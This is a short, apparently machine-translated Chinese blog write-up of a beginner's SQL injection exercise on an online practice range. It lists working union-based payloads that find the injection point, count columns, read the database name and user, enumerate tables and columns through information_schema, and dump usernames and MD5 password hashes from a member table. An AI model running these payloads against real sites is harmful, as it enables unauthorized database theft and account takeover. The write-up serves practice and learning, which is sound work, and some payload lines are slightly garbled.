文章目录
前言
本文仅用于学习和反思巩固SQL注入知识,禁止用于非法攻击。 注意,靶场是练习平台,不能去未经授权的网站进行渗透测试! ! !
1、莫哲射击场开工
莫哲射击场是一个不用自己搭建就可以使用的射击场。 非常适合懒得搭建靶场但又想练习的新手玩家。 网址在这里:
点击打开射击场,然后点击进入
2. 靶场间隙思路 1. 确定注射点
不管输入什么,用户名和密码仍然是错误的,说明注入的地方可能不在这里。 鼠标右键查看源码,发现一个新的URL,就是get注入。 (如图所示)
打开这个网址,成功找到注射处,正片开始。
注入语句是
id=1 and 1=1
id=1 and 1=2
这里我们按照老规则抛出和1=1和和1=2测试,发现1=1页面正常,而报1=2错误,所以是数字注入。 (如图所示)
2.爆炸场数量
(如图)注入语句是id=1 order by 1,逐渐完善数字1,发现是5,报错。 描述字段数量为4
3.爆炸显示位置
(如图)注入语句为id=-1 union 1,2,3。 至于为什么这里的id变成-1,其实是为了防止数据库查询信息而返回错误,从而巧妙的返回我们的注入语句。
发现明显位置是2、3
4、爆出数据库名称、版本、用户等。
如图)注入语句为
id=-1 union select 1,user(),database(),4
获取用户为root,数据库名称为oup
5、爆出数据库表名
注入语句是
id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()
所有表名都获取了,第一个明显可疑。 (如图所示)
6. 展开数据库列表
注入语句是
id=-1 union select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema=database() and table_name="StormGroup_member"
获取四个列名id,name,,(如图)
名字明显且可疑
7. 爆破数据库数据
注入语句是
id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member
获取密码名称(如图)
我发现密码是一串MD5,去MD5解码网站
有两个密码,
发现密码账号登录失败,您可以使用密码账号登录,并成功获取密钥。
总结
这是基于get提交的数字注入。 这篇文章是小白自己写的,巩固sql注入。 如果您路过,请给我一些建议!